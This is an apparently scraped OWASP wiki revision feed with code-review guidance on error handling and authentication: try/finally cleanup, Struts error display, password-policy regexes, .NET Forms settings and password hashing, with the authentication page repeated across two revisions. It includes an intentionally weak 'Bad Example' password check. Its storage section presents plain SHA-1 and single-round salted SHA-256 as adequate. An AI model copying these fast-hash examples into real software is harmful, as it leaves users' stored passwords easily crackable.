     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Java Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public void run() {&lt;br /&gt;
             while (!stop) {&lt;br /&gt;
                 try {&lt;br /&gt;
 &lt;br /&gt;
                     // Perform work here&lt;br /&gt;
 &lt;br /&gt;
                 } catch (Throwable t) {&lt;br /&gt;
                     // Log the exception and continue&lt;br /&gt;
                     WriteToUser(&amp;quot;An error has occurred, put the kettle on&amp;quot;);&lt;br /&gt;
                     logger.log(Level.SEVERE, &amp;quot;Unexpected exception&amp;quot;, t);&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
&lt;br /&gt;
In general, it is best practice to catch a specific type of exception rather than use the basic catch(Exception) or catch(Throwable) statement in the case of Java. &lt;br /&gt;
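The point above can be sketched in Java as follows; the class, method, and file name are illustrative only, not part of any standard API:

```java
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;

// Catch specific exception types, most specific first, instead of a
// blanket catch(Exception) or catch(Throwable).
public class SpecificCatch {
    public static String classify(String path) {
        try (FileReader reader = new FileReader(path)) {
            return "opened";
        } catch (FileNotFoundException e) {
            return "missing";     // the most specific failure mode
        } catch (IOException e) {
            return "io-error";    // any broader I/O failure
        }
    }
}
```

Note that reversing the two catch blocks would not compile, since FileNotFoundException is a subclass of IOException.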
&lt;br /&gt;
In classic ASP there are two ways to do error handling: the first is using the err object with an On Error Resume Next.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Public Function IsInteger (ByVal Number)	 &lt;br /&gt;
   Dim Res, tNumber, re&lt;br /&gt;
   Set re = New RegExp                       'regular expression object used in the pattern test below&lt;br /&gt;
   Number = Trim(Number)&lt;br /&gt;
   tNumber=Number		&lt;br /&gt;
   On Error Resume Next	                     'If an error occurs continue execution&lt;br /&gt;
   Number = CInt(Number) 	             'if Number is an alphanumeric string a Type Mismatch error will occur&lt;br /&gt;
   Res = (err.number = 0) 	             'If there are no errors then return true&lt;br /&gt;
   On Error GoTo 0			     'If an error occurs stop execution and display error&lt;br /&gt;
   re.Pattern = &amp;quot;^[\+\-]? *\d+$&amp;quot;	     'only one +/- and digits are allowed&lt;br /&gt;
   IsInteger = re.Test(tNumber) And Res&lt;br /&gt;
 End Function&lt;br /&gt;
 &lt;br /&gt;
The second is using an error handler on an error page (http://support.microsoft.com/kb/299981).&lt;br /&gt;
 &lt;br /&gt;
 Dim ErrObj&lt;br /&gt;
 set ErrObj = Server.GetLastError()&lt;br /&gt;
 'Now use ErrObj as the regular err object&lt;br /&gt;
&lt;br /&gt;
===Releasing resources and good housekeeping===&lt;br /&gt;
If the language in question has a finally block, use it. The finally block is guaranteed to always execute, whether or not an exception is thrown, and can be used to release resources referenced by the method that threw the exception. This is very important. For example, if a method obtained a database connection from a pool and an exception occurred, without finally the connection object would not be returned to the pool until the timeout expired. This can lead to pool exhaustion. &lt;br /&gt;
&lt;br /&gt;
 PrintWriter out = null;&lt;br /&gt;
 try {&lt;br /&gt;
        System.out.println(&amp;quot;Entering try statement&amp;quot;);&lt;br /&gt;
        out = new PrintWriter(new FileWriter(&amp;quot;OutFile.txt&amp;quot;));&lt;br /&gt;
      //Do Stuff….&lt;br /&gt;
 &lt;br /&gt;
    } catch (IOException e) {&lt;br /&gt;
        System.err.println(&amp;quot;Input exception&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } catch (Exception e) {&lt;br /&gt;
        System.err.println(&amp;quot;Error occurred!&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } finally {&lt;br /&gt;
 &lt;br /&gt;
        if (out != null) {&lt;br /&gt;
            out.close(); // RELEASE RESOURCES&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
A Java example showing a finally block being used to release system resources. Note that the narrower IOException catch must precede the broader Exception catch, or the code will not compile.&lt;br /&gt;
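Since Java 7, the same housekeeping can also be expressed with try-with-resources, which closes the resource automatically whether the block exits normally or via an exception. This is a minimal sketch; the class and file names are illustrative:

```java
import java.io.IOException;
import java.io.PrintWriter;
import java.nio.file.Files;
import java.nio.file.Path;

// try-with-resources: the PrintWriter is closed automatically when the
// block exits, normally or via an exception, so no finally is needed.
public class AutoRelease {
    public static void writeLine(Path file, String line) throws IOException {
        try (PrintWriter out = new PrintWriter(Files.newBufferedWriter(file))) {
            out.println(line);
        }
    }
}
```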
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For Classic ASP pages it is recommended to enclose all cleanup code in a function and call it from an error handling statement after an &amp;quot;On Error Resume Next&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
===Centralised exception handling (Struts Example)===&lt;br /&gt;
Building an infrastructure for consistent error reporting proves more difficult than error handling itself. Struts provides the ActionMessages and ActionErrors classes for maintaining a stack of error messages to be reported, which can be used with JSP tags like &amp;lt;html:errors&amp;gt; to display these error messages to the user. &lt;br /&gt;
&lt;br /&gt;
To report a different severity of a message in a different manner (like error, warning, or information) the following tasks are required: &lt;br /&gt;
&lt;br /&gt;
# Register, instantiate the errors under the appropriate severity&lt;br /&gt;
# Identify these messages and show them in a consistent manner.&lt;br /&gt;
&lt;br /&gt;
Struts ActionErrors class makes error handling quite easy:&lt;br /&gt;
&lt;br /&gt;
 ActionErrors errors = new ActionErrors();&lt;br /&gt;
 errors.add(&amp;quot;fatal&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;error&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;warning&amp;quot;, new ActionError(&amp;quot;....&amp;quot;));&lt;br /&gt;
 errors.add(&amp;quot;information&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 saveErrors(request,errors); // Important to do this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now that we have added the errors, we display them by using tags in the HTML page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;logic:messagePresent property=&amp;quot;error&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;html:messages property=&amp;quot;error&amp;quot; id=&amp;quot;errMsg&amp;quot; &amp;gt;&lt;br /&gt;
     &amp;lt;bean:write name=&amp;quot;errMsg&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/html:messages&amp;gt;&lt;br /&gt;
 &amp;lt;/logic:messagePresent&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For classic ASP pages you need to do some IIS configuration; see http://support.microsoft.com/kb/299981 for more information.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60154</id>
		<title>Codereview-Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60154"/>
				<updated>2009-05-05T11:55:13Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Vulnerabilities related to authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
“Who are you?” Authentication is the process by which an entity proves its identity to another entity, typically through credentials such as a username and password. &lt;br /&gt;
&lt;br /&gt;
Depending on your requirements, there are several available authentication mechanisms to choose from. If they are not correctly chosen and implemented, the authentication mechanism can expose vulnerabilities that attackers can exploit to gain access to your system. &lt;br /&gt;
&lt;br /&gt;
The storage of passwords and user credentials is an issue from a defense in depth approach, but also from a compliance standpoint. The following section also discusses password storage and what to review for.&lt;br /&gt;
&lt;br /&gt;
The following sections discuss aspects of source code relating to weak authentication functionality, which could be due to flawed implementation or broken business logic. Authentication is a key line of defence in protecting non-public data and sensitive functionality. &lt;br /&gt;
&lt;br /&gt;
===Weak Passwords and Password Functionality===&lt;br /&gt;
Password strength should be enforced upon a user setting/selecting a password. Passwords should be complex in composition. Such checks should be done on the backend/server side of the application upon an attempt to submit a new password. &lt;br /&gt;
&lt;br /&gt;
====Bad Example====&lt;br /&gt;
Simply checking that a password is not NULL is not sufficient:&lt;br /&gt;
&lt;br /&gt;
 String password = request.getParameter(&amp;quot;Password&amp;quot;);&lt;br /&gt;
 if (password == null) {&lt;br /&gt;
     throw new InvalidPasswordException();&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
====Good Example====&lt;br /&gt;
Passwords should be checked for the following composition, or a variant of it:&lt;br /&gt;
&lt;br /&gt;
* at least: 1 uppercase character (A-Z)&lt;br /&gt;
* at least: 1 lowercase character (a-z)&lt;br /&gt;
* at least: 1 digit (0-9)&lt;br /&gt;
* at least one special character (!&amp;quot;£$%&amp;amp;...)&lt;br /&gt;
* a defined minimum length (8 chars)&lt;br /&gt;
* a defined maximum length (as with all external input)&lt;br /&gt;
* no sequential characters (e.g. 123abcd)&lt;br /&gt;
* no more than 2 identical characters in a row (e.g. 1111)&lt;br /&gt;
&lt;br /&gt;
Such rules should be looked for in the code and applied as soon as the HTTP request is received. The rules can be complex regular expressions or logical code statements: &lt;br /&gt;
&lt;br /&gt;
 if password.RegEx([a-z])&lt;br /&gt;
    and password.RegEx([A-Z])&lt;br /&gt;
    and password.RegEx([0-9])&lt;br /&gt;
    and password.RegEx({8-30})&lt;br /&gt;
    and password.RegEx([!&amp;quot;£$%^&amp;amp;*()])&lt;br /&gt;
    return true;&lt;br /&gt;
 else&lt;br /&gt;
    return false;&lt;br /&gt;
&lt;br /&gt;
A regular expression implementing the checks above:&lt;br /&gt;
&lt;br /&gt;
 (?=^.{8,30}$)(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^&amp;amp;*()_+}{&amp;quot;&amp;quot;:;'?/&amp;gt;.&amp;lt;,]).*$&lt;br /&gt;
&lt;br /&gt;
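A minimal Java sketch of the same kind of policy check, using java.util.regex (the special-character class here is an illustrative subset of the one above, kept small for readability):&lt;br /&gt;

```java
import java.util.regex.Pattern;

public class PasswordPolicy {
    // Lookaheads enforce: 8-30 characters, at least one digit,
    // one lowercase, one uppercase, and one special character
    // (illustrative subset of the character class shown above).
    private static final Pattern POLICY = Pattern.compile(
        "(?=^.{8,30}$)(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^*()_+{}:;'?/.,]).*$");

    public static boolean isCompliant(String password) {
        if (password == null) return false;
        return POLICY.matcher(password).matches();
    }
}
```
&lt;br /&gt;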
=== '''.NET Authentication controls''' ===&lt;br /&gt;
In .NET, authentication is configured via tags in the application configuration file. &lt;br /&gt;
&lt;br /&gt;
The &amp;lt;'''authentication'''&amp;gt; element configures the authentication mode that your applications use.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;'''authentication'''&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The appropriate authentication mode depends on how your application or Web&lt;br /&gt;
service has been designed. The default Machine.config setting applies a secure&lt;br /&gt;
Windows authentication default as shown below.&lt;br /&gt;
&lt;br /&gt;
''' authentication Attributes:mode=&amp;quot;[Windows|Forms|Passport|None]&amp;quot; '''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;authentication mode=&amp;quot;Windows&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Forms Authentication Guidelines '''&lt;br /&gt;
To use Forms authentication, set mode=“Forms” on the &amp;lt;authentication&amp;gt; element.&lt;br /&gt;
Next, configure Forms authentication using the child &amp;lt;forms&amp;gt; element. The&lt;br /&gt;
following fragment shows a secure &amp;lt;forms&amp;gt; authentication element configuration:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;authentication mode=&amp;quot;Forms&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;forms loginUrl=&amp;quot;Restricted\login.aspx&amp;quot;     Login page in an SSL protected folder&lt;br /&gt;
       protection=&amp;quot;All&amp;quot;                      Privacy and integrity&lt;br /&gt;
       requireSSL=&amp;quot;true&amp;quot;                     Prevents cookie being sent over http&lt;br /&gt;
       timeout=&amp;quot;10&amp;quot;                          Limited session lifetime&lt;br /&gt;
       name=&amp;quot;AppNameCookie&amp;quot;                  Unique per-application name&lt;br /&gt;
       path=&amp;quot;/FormsAuth&amp;quot;                     and path&lt;br /&gt;
       slidingExpiration=&amp;quot;true&amp;quot; &amp;gt;            Sliding session lifetime&lt;br /&gt;
 &amp;lt;/forms&amp;gt;&lt;br /&gt;
 &amp;lt;/authentication&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use the following recommendations to improve Forms authentication security:&lt;br /&gt;
* Partition your Web site.&lt;br /&gt;
* Set protection=“All”.&lt;br /&gt;
* Use small cookie time-out values.&lt;br /&gt;
* Consider using a fixed expiration period.&lt;br /&gt;
* Use SSL with Forms authentication.&lt;br /&gt;
* If you do not use SSL, set slidingExpiration = “false”.&lt;br /&gt;
* Do not use the &amp;lt;credentials&amp;gt; element on production servers.&lt;br /&gt;
* Configure the &amp;lt;machineKey&amp;gt; element.&lt;br /&gt;
* Use unique cookie names and paths.&lt;br /&gt;
&lt;br /&gt;
For classic ASP pages, authentication is usually performed manually by including the user information in session variables after validation against a DB, so you can look for something like: &lt;br /&gt;
 Session (&amp;quot;UserId&amp;quot;) = UserName&lt;br /&gt;
 Session (&amp;quot;Roles&amp;quot;) = UserRoles&lt;br /&gt;
&lt;br /&gt;
====Cookieless Forms authentication====&lt;br /&gt;
By default, Forms authentication tickets are stored in cookies (authentication tickets are used to remember that the user has authenticated to the system), for example as a unique ID in a cookie in the HTTP header. Other methods exist to preserve authentication state over the stateless HTTP protocol. The cookieless attribute defines the type of authentication ticket to be used. &lt;br /&gt;
&lt;br /&gt;
Types of cookieless values on the &amp;lt;forms&amp;gt; element:&lt;br /&gt;
&lt;br /&gt;
* UseCookies – specifies that cookie tickets will always be used. &lt;br /&gt;
* UseUri – indicates that cookie tickets will never be used. &lt;br /&gt;
* AutoDetect – cookie tickets are not used if the device does not support them; if the device profile supports cookies, a probing function is used to determine whether cookies are enabled. &lt;br /&gt;
* UseDeviceProfile – the default setting if not defined; uses cookie-based authentication tickets only if the device profile supports cookies. A probing function is not used.&lt;br /&gt;
&lt;br /&gt;
cookieless=&amp;quot;UseUri&amp;quot; : an example of what may be found on the &amp;lt;forms&amp;gt; element above&lt;br /&gt;
&lt;br /&gt;
When we talk about probing, we are referring to the User-Agent field of the HTTP header, which can tell ASP.NET whether cookies are supported.&lt;br /&gt;
&lt;br /&gt;
==Password Storage Strategy==&lt;br /&gt;
The storage of passwords is also of concern, as unauthorized access to an application may allow an attacker to reach the area where passwords are stored.&lt;br /&gt;
&lt;br /&gt;
Passwords should be stored using a one-way hash algorithm. One-way functions (SHA-256, SHA-1, MD5, ...) are also known as hashing functions. Once passwords are persisted, there is no reason for them to be human-readable. The authentication functionality hashes the password supplied by the user and compares it to the stored hash; if the hashes are equal, the passwords are identical.&lt;br /&gt;
&lt;br /&gt;
Storing a hash of a password, which cannot be reversed, makes it more difficult to recover the plain text passwords. It also ensures that administration staff for an application does not have access to other users’ passwords, and hence helps mitigate the internal threat vector.&lt;br /&gt;
&lt;br /&gt;
Example code in Java implementing SHA-1 hashing:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password)&lt;br /&gt;
        throws NoSuchAlgorithmException, UnsupportedEncodingException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
'''Salting:'''&lt;br /&gt;
Storing simply hashed passwords has its issues, such as the possibility of identifying two identical passwords (identical hashes) and also the [http://en.wikipedia.org/wiki/Birthday_paradox birthday attack]. A countermeasure for such issues is to introduce a salt: a random value of a fixed length that must be different for each stored entry. It can be stored in clear text next to the hashed password:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password, byte[] salt)&lt;br /&gt;
        throws NoSuchAlgorithmException, UnsupportedEncodingException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-256&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       digest.update(salt);&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
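Putting the salting and hashing steps above together, a hypothetical register/verify flow might look like the following (PasswordStore, newSalt, and verify are illustrative names, not part of any framework):&lt;br /&gt;

```java
import java.security.MessageDigest;
import java.security.SecureRandom;

public class PasswordStore {
    // Generate a fixed-length random salt, one per stored entry.
    public static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    // Hash the salt followed by the password bytes, as above.
    public static byte[] hash(String password, byte[] salt) throws Exception {
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        digest.reset();
        digest.update(salt);
        return digest.digest(password.getBytes("UTF-8"));
    }

    // At login: recompute with the stored salt and compare digests.
    public static boolean verify(String attempt, byte[] salt, byte[] stored) throws Exception {
        return MessageDigest.isEqual(hash(attempt, salt), stored);
    }
}
```
&lt;br /&gt;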
===Vulnerabilities related to authentication ===&lt;br /&gt;
&lt;br /&gt;
There are many authentication issues that involve form fields. Inadequate field validation can give rise to the following issues:&lt;br /&gt;
&lt;br /&gt;
*[[Reviewing Code for SQL Injection]]&lt;br /&gt;
SQL injection can be used to bypass authentication functionality and even add a malicious user to a system for future use.&lt;br /&gt;
*[[Reviewing Code for Data Validation]]&lt;br /&gt;
Data validation of all external input must be performed. This also goes for authentication fields.&lt;br /&gt;
*[[Reviewing Code for Cross-site scripting]]&lt;br /&gt;
Cross-site scripting can be used on the authentication page to perform identity theft, phishing, and session-hijacking attacks.&lt;br /&gt;
*[[Reviewing Code for Error Handling]]&lt;br /&gt;
Bad or weak error handling can be used to establish the internal workings of the authentication functionality, such as giving insight into the database structure or into valid and invalid user IDs.&lt;br /&gt;
*[[Hashing Java|Hashing with Java]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60153</id>
		<title>Codereview-Authentication</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Authentication&amp;diff=60153"/>
				<updated>2009-05-05T11:54:05Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Password Storage Strategy */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
“Who are you?” Authentication is the process by which an entity proves its identity to another entity, typically through credentials such as a username and password. &lt;br /&gt;
&lt;br /&gt;
Depending on your requirements, there are several available authentication mechanisms to choose from. If they are not correctly chosen and implemented, the authentication mechanism can expose vulnerabilities that attackers can exploit to gain access to your system. &lt;br /&gt;
&lt;br /&gt;
The storage of passwords and user credentials is an issue from a defense in depth approach, but also from a compliance standpoint. The following section also discusses password storage and what to review for.&lt;br /&gt;
&lt;br /&gt;
The following sections discuss aspects of source code relating to weak authentication functionality, which could be due to flawed implementation or broken business logic. Authentication is a key line of defence in protecting non-public data and sensitive functionality. &lt;br /&gt;
&lt;br /&gt;
===Weak Passwords and Password Functionality===&lt;br /&gt;
Password strength should be enforced upon a user setting/selecting a password. Passwords should be complex in composition. Such checks should be done on the backend/server side of the application upon an attempt to submit a new password. &lt;br /&gt;
&lt;br /&gt;
====Bad Example====&lt;br /&gt;
Simply checking that a password is not NULL is not sufficient:&lt;br /&gt;
&lt;br /&gt;
 String password = request.getParameter(&amp;quot;Password&amp;quot;);&lt;br /&gt;
 if (password == null) {&lt;br /&gt;
     throw new InvalidPasswordException();&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
====Good Example====&lt;br /&gt;
Passwords should be checked for the following composition, or a variant of it:&lt;br /&gt;
&lt;br /&gt;
* at least: 1 uppercase character (A-Z)&lt;br /&gt;
* at least: 1 lowercase character (a-z)&lt;br /&gt;
* at least: 1 digit (0-9)&lt;br /&gt;
* at least one special character (!&amp;quot;£$%&amp;amp;...)&lt;br /&gt;
* a defined minimum length (8 chars)&lt;br /&gt;
* a defined maximum length (as with all external input)&lt;br /&gt;
* no sequential characters (e.g. 123abcd)&lt;br /&gt;
* no more than 2 identical characters in a row (e.g. 1111)&lt;br /&gt;
&lt;br /&gt;
Such rules should be looked for in the code and applied as soon as the HTTP request is received. The rules can be complex regular expressions or logical code statements: &lt;br /&gt;
&lt;br /&gt;
 if password.RegEx([a-z])&lt;br /&gt;
    and password.RegEx([A-Z])&lt;br /&gt;
    and password.RegEx([0-9])&lt;br /&gt;
    and password.RegEx({8-30})&lt;br /&gt;
    and password.RegEx([!&amp;quot;£$%^&amp;amp;*()])&lt;br /&gt;
    return true;&lt;br /&gt;
 else&lt;br /&gt;
    return false;&lt;br /&gt;
&lt;br /&gt;
A regular expression implementing the checks above:&lt;br /&gt;
&lt;br /&gt;
 (?=^.{8,30}$)(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^&amp;amp;*()_+}{&amp;quot;&amp;quot;:;'?/&amp;gt;.&amp;lt;,]).*$&lt;br /&gt;
&lt;br /&gt;
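A minimal Java sketch of the same kind of policy check, using java.util.regex (the special-character class here is an illustrative subset of the one above, kept small for readability):&lt;br /&gt;

```java
import java.util.regex.Pattern;

public class PasswordPolicy {
    // Lookaheads enforce: 8-30 characters, at least one digit,
    // one lowercase, one uppercase, and one special character
    // (illustrative subset of the character class shown above).
    private static final Pattern POLICY = Pattern.compile(
        "(?=^.{8,30}$)(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[!@#$%^*()_+{}:;'?/.,]).*$");

    public static boolean isCompliant(String password) {
        if (password == null) return false;
        return POLICY.matcher(password).matches();
    }
}
```
&lt;br /&gt;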
=== '''.NET Authentication controls''' ===&lt;br /&gt;
In .NET, authentication is configured via tags in the application configuration file. &lt;br /&gt;
&lt;br /&gt;
The &amp;lt;'''authentication'''&amp;gt; element configures the authentication mode that your applications use.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;'''authentication'''&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The appropriate authentication mode depends on how your application or Web&lt;br /&gt;
service has been designed. The default Machine.config setting applies a secure&lt;br /&gt;
Windows authentication default as shown below.&lt;br /&gt;
&lt;br /&gt;
''' authentication Attributes:mode=&amp;quot;[Windows|Forms|Passport|None]&amp;quot; '''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;authentication mode=&amp;quot;Windows&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Forms Authentication Guidelines '''&lt;br /&gt;
To use Forms authentication, set mode=“Forms” on the &amp;lt;authentication&amp;gt; element.&lt;br /&gt;
Next, configure Forms authentication using the child &amp;lt;forms&amp;gt; element. The&lt;br /&gt;
following fragment shows a secure &amp;lt;forms&amp;gt; authentication element configuration:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;authentication mode=&amp;quot;Forms&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;forms loginUrl=&amp;quot;Restricted\login.aspx&amp;quot;     Login page in an SSL protected folder&lt;br /&gt;
       protection=&amp;quot;All&amp;quot;                      Privacy and integrity&lt;br /&gt;
       requireSSL=&amp;quot;true&amp;quot;                     Prevents cookie being sent over http&lt;br /&gt;
       timeout=&amp;quot;10&amp;quot;                          Limited session lifetime&lt;br /&gt;
       name=&amp;quot;AppNameCookie&amp;quot;                  Unique per-application name&lt;br /&gt;
       path=&amp;quot;/FormsAuth&amp;quot;                     and path&lt;br /&gt;
       slidingExpiration=&amp;quot;true&amp;quot; &amp;gt;            Sliding session lifetime&lt;br /&gt;
 &amp;lt;/forms&amp;gt;&lt;br /&gt;
 &amp;lt;/authentication&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use the following recommendations to improve Forms authentication security:&lt;br /&gt;
* Partition your Web site.&lt;br /&gt;
* Set protection=“All”.&lt;br /&gt;
* Use small cookie time-out values.&lt;br /&gt;
* Consider using a fixed expiration period.&lt;br /&gt;
* Use SSL with Forms authentication.&lt;br /&gt;
* If you do not use SSL, set slidingExpiration = “false”.&lt;br /&gt;
* Do not use the &amp;lt;credentials&amp;gt; element on production servers.&lt;br /&gt;
* Configure the &amp;lt;machineKey&amp;gt; element.&lt;br /&gt;
* Use unique cookie names and paths.&lt;br /&gt;
&lt;br /&gt;
For classic ASP pages, authentication is usually performed manually by including the user information in session variables after validation against a DB, so you can look for something like: &lt;br /&gt;
 Session (&amp;quot;UserId&amp;quot;) = UserName&lt;br /&gt;
 Session (&amp;quot;Roles&amp;quot;) = UserRoles&lt;br /&gt;
&lt;br /&gt;
====Cookieless Forms authentication====&lt;br /&gt;
By default, Forms authentication tickets are stored in cookies (authentication tickets are used to remember that the user has authenticated to the system), for example as a unique ID in a cookie in the HTTP header. Other methods exist to preserve authentication state over the stateless HTTP protocol. The cookieless attribute defines the type of authentication ticket to be used. &lt;br /&gt;
&lt;br /&gt;
Types of cookieless values on the &amp;lt;forms&amp;gt; element:&lt;br /&gt;
&lt;br /&gt;
* UseCookies – specifies that cookie tickets will always be used. &lt;br /&gt;
* UseUri – indicates that cookie tickets will never be used. &lt;br /&gt;
* AutoDetect – cookie tickets are not used if the device does not support them; if the device profile supports cookies, a probing function is used to determine whether cookies are enabled. &lt;br /&gt;
* UseDeviceProfile – the default setting if not defined; uses cookie-based authentication tickets only if the device profile supports cookies. A probing function is not used.&lt;br /&gt;
&lt;br /&gt;
cookieless=&amp;quot;UseUri&amp;quot; : an example of what may be found on the &amp;lt;forms&amp;gt; element above&lt;br /&gt;
&lt;br /&gt;
When we talk about probing, we are referring to the User-Agent field of the HTTP header, which can tell ASP.NET whether cookies are supported.&lt;br /&gt;
&lt;br /&gt;
==Password Storage Strategy==&lt;br /&gt;
The storage of passwords is also of concern, as unauthorized access to an application may allow an attacker to reach the area where passwords are stored.&lt;br /&gt;
&lt;br /&gt;
Passwords should be stored using a one-way hash algorithm. One-way functions (SHA-256, SHA-1, MD5, ...) are also known as hashing functions. Once passwords are persisted, there is no reason for them to be human-readable. The authentication functionality hashes the password supplied by the user and compares it to the stored hash; if the hashes are equal, the passwords are identical.&lt;br /&gt;
&lt;br /&gt;
Storing a hash of a password, which cannot be reversed, makes it more difficult to recover the plain text passwords. It also ensures that administration staff for an application does not have access to other users’ passwords, and hence helps mitigate the internal threat vector.&lt;br /&gt;
&lt;br /&gt;
Example code in Java implementing SHA-1 hashing:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password)&lt;br /&gt;
        throws NoSuchAlgorithmException, UnsupportedEncodingException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
'''Salting:'''&lt;br /&gt;
Storing simply hashed passwords has its issues, such as the possibility of identifying two identical passwords (identical hashes) and also the [http://en.wikipedia.org/wiki/Birthday_paradox birthday attack]. A countermeasure for such issues is to introduce a salt: a random value of a fixed length that must be different for each stored entry. It can be stored in clear text next to the hashed password:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password, byte[] salt)&lt;br /&gt;
        throws NoSuchAlgorithmException, UnsupportedEncodingException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-256&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       digest.update(salt);&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
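Putting the salting and hashing steps above together, a hypothetical register/verify flow might look like the following (PasswordStore, newSalt, and verify are illustrative names, not part of any framework):&lt;br /&gt;

```java
import java.security.MessageDigest;
import java.security.SecureRandom;

public class PasswordStore {
    // Generate a fixed-length random salt, one per stored entry.
    public static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    // Hash the salt followed by the password bytes, as above.
    public static byte[] hash(String password, byte[] salt) throws Exception {
        MessageDigest digest = MessageDigest.getInstance("SHA-256");
        digest.reset();
        digest.update(salt);
        return digest.digest(password.getBytes("UTF-8"));
    }

    // At login: recompute with the stored salt and compare digests.
    public static boolean verify(String attempt, byte[] salt, byte[] stored) throws Exception {
        return MessageDigest.isEqual(hash(attempt, salt), stored);
    }
}
```
&lt;br /&gt;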
===Vulnerabilities related to authentication ===&lt;br /&gt;
&lt;br /&gt;
There are many authentication issues that involve form fields. Inadequate field validation can give rise to the following issues:&lt;br /&gt;
&lt;br /&gt;
*[[Reviewing Code for SQL Injection]]&lt;br /&gt;
SQL injection can be used to bypass authentication functionality and even add a malicious user to a system for future use.&lt;br /&gt;
